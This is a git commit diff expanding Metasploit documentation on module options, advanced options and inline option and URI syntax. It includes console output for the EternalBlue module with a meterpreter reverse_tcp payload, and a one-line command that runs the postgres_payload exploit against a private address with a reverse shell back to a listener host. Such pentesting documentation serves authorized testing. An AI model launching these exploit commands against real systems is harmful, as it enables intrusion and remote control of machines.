Add additional preamble to multiple guides

2022-04-22 17:12:13 +01:00
parent a20c281507
commit 8f459e7144
5 changed files with 215 additions and 8 deletions
@@ -1,4 +1,76 @@
-## Examples
+## Module options
+
+Each Metasploit module has a set of options which must be set before running. These can be seen with the `show options` or `options` command:
+
+```
+msf6 exploit(windows/smb/ms17_010_eternalblue) > options
+
+Module options (exploit/windows/smb/ms17_010_eternalblue):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          445              yes       The target port (TCP)
+   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
+   SMBPass                         no        (Optional) The password for the specified username
+   SMBUser                         no        (Optional) The username to authenticate as
+   ... etc ...
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.239    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+```
+
+Each Metasploit module also has _advanced_ options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful:
+
+```
+msf6 exploit(windows/smb/ms17_010_eternalblue) > advanced
+
+Module advanced options (exploit/windows/smb/ms17_010_eternalblue):
+
+   Name                    Current Setting                     Required  Description
+   ----                    ---------------                     --------  -----------
+   CHOST                                                       no        The local client address
+   CPORT                                                       no        The local client port
+   CheckModule             auxiliary/scanner/smb/smb_ms17_010  yes       Module to check with
+   ConnectTimeout          10                                  yes       Maximum number of seconds to establish a TCP connection
+   ... etc ...
+
+Payload advanced options (windows/x64/meterpreter/reverse_tcp):
+
+   Name                         Current Setting  Required  Description
+   ----                         ---------------  --------  -----------
+   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
+   AutoRunScript                                 no        A script to run automatically on session creation.
+   AutoSystemInfo               true             yes       Automatically capture system information on
+   ... etc ...
+```
+
+You can see which options stilloptions to be set with the `show missing` command:
+
+```
+msf6 exploit(windows/smb/ms17_010_eternalblue) > show missing
+
+Module options (exploit/windows/smb/ms17_010_eternalblue):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+```
+
+### Setting options

 Traditional usage of Metasploit involves loading a module, and setting multiple options individually:

@@ -14,18 +86,26 @@ set lport 5000
 run
 ```

-Traditionally, you can also specify multiple RHOSTS separated by spaces or with a CIDR subnet mask:
+You can also specify multiple RHOSTS separated by spaces or with a CIDR subnet mask:

 ```
 set rhosts 127.0.0.1 127.0.0.2
 set rhosts 127.0.0.1/24
 ```

-This document describes a modern approach to setting multiple options in a command. This workflow will not only make it easier to use `reverse-i-search` with `CTRL+R` in Metasploit's console, but it will also make it easier to share cheat sheets amongst pentesters.
+In 2021 support for running a module and specifying module options at the same time was added, dubbed inline option support. This workflow will not only make it easier to use `reverse-i-search` with `CTRL+R` in Metasploit's console, but it will also make it easier to share cheat sheets amongst pentesters.
+
+Example:
+
+```
+use exploit/linux/postgres/postgres_payload
+run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64' verbose=true
+```

 ### URI support for RHOSTS

-Metasploit now supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments to the run command to specify RHOST values and option values at once:
+Metasploit also supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments,
+which allows setting multiple options at once - i.e. username, password, rport, rhost, etc.

 ```
 use exploit/linux/postgres/postgres_payload
@@ -50,7 +130,7 @@ use auxiliary/admin/postgres/postgres_sql
 run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
 ```

-In some scenarios it may be too troublesome to escape quotes within a password. In this scenario it possible to still set the password option manually and use the URI argument without a password specified, the module will gracefully fallback to using the manually set password:
+In some scenarios it may be too troublesome to escape quotes within a password. In this scenario it is possible to still set the password option manually and use the URI argument without a password specified, the module will gracefully fallback to using the manually set password:

 ```
 set password !@£$%^&*()"'